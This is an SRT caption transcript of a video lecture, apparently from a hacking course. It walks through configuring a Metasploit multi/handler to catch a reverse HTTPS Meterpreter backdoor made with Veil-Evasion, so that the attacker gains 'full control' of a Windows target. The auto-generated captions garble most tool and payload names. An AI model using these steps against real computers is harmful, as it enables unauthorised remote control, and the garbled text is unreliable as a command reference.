1
00:00:02,030 --> 00:00:07,700
Now the back door that we created uses a reverse payload.

2
00:00:07,700 --> 00:00:15,170
So like I said before it does not open a port and the target computer it actually connects from the

3
00:00:15,170 --> 00:00:18,060
target's computer to our computer.

4
00:00:18,170 --> 00:00:24,560
And by doing that it will bypass firewalls and it'll look less suspicious.

5
00:00:24,560 --> 00:00:31,670
So for this to work we need to open a port in our computer so that the back door can connect from the

6
00:00:31,670 --> 00:00:34,810
target computer to us on that port.

7
00:00:35,180 --> 00:00:41,300
So if you remember when I created the backdoor I said the port to 80 80.

8
00:00:41,510 --> 00:00:48,290
So I need to open that port in my Callimachi so that when the target person executes the back door the

9
00:00:48,290 --> 00:00:53,460
back door can connect back to me on port 80 80.

10
00:00:53,510 --> 00:00:58,760
So I'm just going to write the name of the payload that we used because that's very important when you're

11
00:00:58,760 --> 00:01:00,980
listening for incoming connections.

12
00:01:01,040 --> 00:01:04,040
So we use a payload that's written in go.

13
00:01:04,220 --> 00:01:11,200
And that was amateur Peter Rev TTP S which is a reverse TTP as payload.

14
00:01:11,210 --> 00:01:12,310
Now this is not a command.

15
00:01:12,320 --> 00:01:21,350
I'm just going to write it in here so just that you keep this in mind and we use port 80 80 for the

16
00:01:21,350 --> 00:01:22,510
reverse connection.

17
00:01:22,690 --> 00:01:28,770
So these are the most important things to keep in mind when listening for incoming connections.

18
00:01:28,930 --> 00:01:30,550
So I'm going to split the screen

19
00:01:33,580 --> 00:01:39,940
and I'm going to listen for incoming connections in here and to do that I'm going to use the mute exploit

20
00:01:39,940 --> 00:01:42,670
framework now to run me to blow it.

21
00:01:42,670 --> 00:01:48,670
All you have to do is just run MSF Konsole now meet us ploys.

22
00:01:48,670 --> 00:01:52,610
Framework is a huge framework for penetration testing.

23
00:01:52,610 --> 00:01:58,900
So Mr. Patel a backdoor or the interpreter payload that will create is for us is actually programmed

24
00:01:59,080 --> 00:02:01,110
by the people who made us Lloyd.

25
00:02:01,240 --> 00:02:04,860
That's why we're using meter's ploy to listen for incoming connections.

26
00:02:04,990 --> 00:02:11,810
So Bill evasion actually uses meter's ploy to generate the backdoor that we chose in the previous video

27
00:02:13,270 --> 00:02:18,570
so to listen for incoming connections we're going to use a module Ameet exploit known as Floyd.

28
00:02:18,580 --> 00:02:22,340
As I said is a huge framework and it has a lot of modules.

29
00:02:22,660 --> 00:02:28,090
So the module that we're interested in is a module that allows us to listen for incoming connections

30
00:02:28,300 --> 00:02:32,080
from amateur Peter payload to use that module.

31
00:02:32,080 --> 00:02:39,790
We're going to do use to use a module and then we're going to specify the module name and the module

32
00:02:39,790 --> 00:02:44,760
name is exploit multiday handler.

33
00:02:44,810 --> 00:02:51,610
OK so the command we're using is used to specify the module that we want to use and we're using a module

34
00:02:51,610 --> 00:02:57,220
called exploit multi handler that allows us to listen for incoming connections.

35
00:02:57,280 --> 00:03:04,610
I'm going to hit enter and I was already in that module so you can see that nothing changed for me but

36
00:03:04,610 --> 00:03:13,130
for you you should navigate to that Madill and I'm going to do show options to see the options that

37
00:03:13,130 --> 00:03:15,360
I can set for this module.

38
00:03:17,500 --> 00:03:24,830
And you can see that you can specify different options for as the most important thing that you want

39
00:03:24,830 --> 00:03:27,140
to specify is the payload.

40
00:03:27,470 --> 00:03:30,710
So you can see and hear for me it's set to Windows.

41
00:03:30,790 --> 00:03:31,810
Mr. Peter.

42
00:03:31,860 --> 00:03:40,990
Reverse TCAP And if you remember what we used we used amateur Preter reverse Hashd TTP as not DCP.

43
00:03:41,180 --> 00:03:43,040
So you want to change this.

44
00:03:43,040 --> 00:03:48,470
The first part is fine because our target is going to be Windows but you want to change the reverse

45
00:03:48,470 --> 00:03:56,450
TCAP to reverse hasty S and you can change that exactly the same way that we did with Bill evasion.

46
00:03:56,480 --> 00:04:03,670
So you type in set you put the option name that you want to change and we want to change the option

47
00:04:03,670 --> 00:04:04,650
for the payload.

48
00:04:04,660 --> 00:04:12,770
So we're going to say payload and we're going to send that to Windows Mattel praeter reverse Hastey

49
00:04:12,770 --> 00:04:18,330
CPS this time.

50
00:04:18,460 --> 00:04:21,580
OK so we're doing set to set an option.

51
00:04:21,580 --> 00:04:26,410
We're setting the payload to Windows macerator very safe shitty piece.

52
00:04:26,440 --> 00:04:31,870
Now this payload should correspond to the payload that you chose in the back door.

53
00:04:31,870 --> 00:04:35,670
So in the back door we used Mr. Peter vs. shitty POS.

54
00:04:35,770 --> 00:04:39,060
That's why in here we use in reverse disappears as well.

55
00:04:39,190 --> 00:04:43,370
If you chose the reverse TTP then set this to revert to ETP.

56
00:04:43,420 --> 00:04:48,130
If you use reverse ECP then set this reverse TZP and so on.

57
00:04:48,130 --> 00:04:50,140
So I'm going to hit enter for this.

58
00:04:50,140 --> 00:04:51,690
And that's going to do it for me.

59
00:04:51,880 --> 00:04:53,400
And if I do show options now

60
00:04:57,160 --> 00:04:59,830
you'll see the payload changed to Windows.

61
00:04:59,830 --> 00:05:01,510
Mr. Patel reverse his shit.

62
00:05:01,530 --> 00:05:02,880
Yes.

63
00:05:02,890 --> 00:05:06,100
Now the same concept applies for all the other options.

64
00:05:06,130 --> 00:05:11,320
So you want to set the host to our IP address and you can see that this is already set to the right

65
00:05:11,320 --> 00:05:11,810
one.

66
00:05:11,830 --> 00:05:13,320
So if it was wrong for you.

67
00:05:13,360 --> 00:05:21,400
All you have to do is just do set a host and put your IP address so you can get the IP address used

68
00:05:21,400 --> 00:05:24,330
in ifconfig like I showed you in the previous lecture.

69
00:05:24,330 --> 00:05:30,000
So for me it's 10 20 40 to 13.

70
00:05:30,000 --> 00:05:35,350
And again this is the same IP that I used when I created my doctor.

71
00:05:35,610 --> 00:05:38,550
And same goes for the port you want to set the same port.

72
00:05:38,580 --> 00:05:47,780
So we're going to do set Bellport to 80 80 because that's the part that we used when we generated the

73
00:05:47,780 --> 00:05:48,580
back door.

74
00:05:48,920 --> 00:05:54,830
So again the main idea with this is you want to set the payload the host and the port to exactly the

75
00:05:54,830 --> 00:05:58,480
same options that you chose when you created the backdoor.

76
00:05:58,610 --> 00:06:01,650
Once done with that we're going to do show options one more time.

77
00:06:04,600 --> 00:06:08,140
And you'll see that I have my payload set properly.

78
00:06:08,140 --> 00:06:10,720
When does Mr. Puteri vs. the CPS.

79
00:06:10,780 --> 00:06:16,660
I have my Ehle host and I have my airport and all of that is done properly.

80
00:06:16,720 --> 00:06:23,140
So all we have to do now is just do exploit.

81
00:06:23,410 --> 00:06:30,010
And now Mr. Lloyd is waiting for connections as you can see on port 80 80.

82
00:06:30,220 --> 00:06:34,770
And on my IP address which is 10 2014 to 13.

83
00:06:34,840 --> 00:06:41,170
So now if anybody opens the back door that we created in the previous lecture because the reverse back

84
00:06:41,170 --> 00:06:47,080
door the back door will try to connect to the IP that we set when we created the backdoor which was

85
00:06:47,110 --> 00:06:48,810

86
10:24 22:13.

87
00:06:49,000 --> 00:06:51,900
And it will try to connect on port 80 80.

88
00:06:52,300 --> 00:06:58,150
It's going to come to this computer and this computer is already waiting for that connection from this

89
00:06:58,150 --> 00:07:00,660
multi handler module.

90
00:07:00,750 --> 00:07:05,990
So the connection will be established and then I'll be able to control the target computer and I'll

91
00:07:06,000 --> 00:07:09,730
basically Hockett and have full control over it.

92
00:07:09,750 --> 00:07:15,000
Now the next sector I'll show you a very basic way to deliver the backdoor to the target computer and

93
00:07:15,000 --> 00:07:18,340
how to test the back door and make sure that it works properly.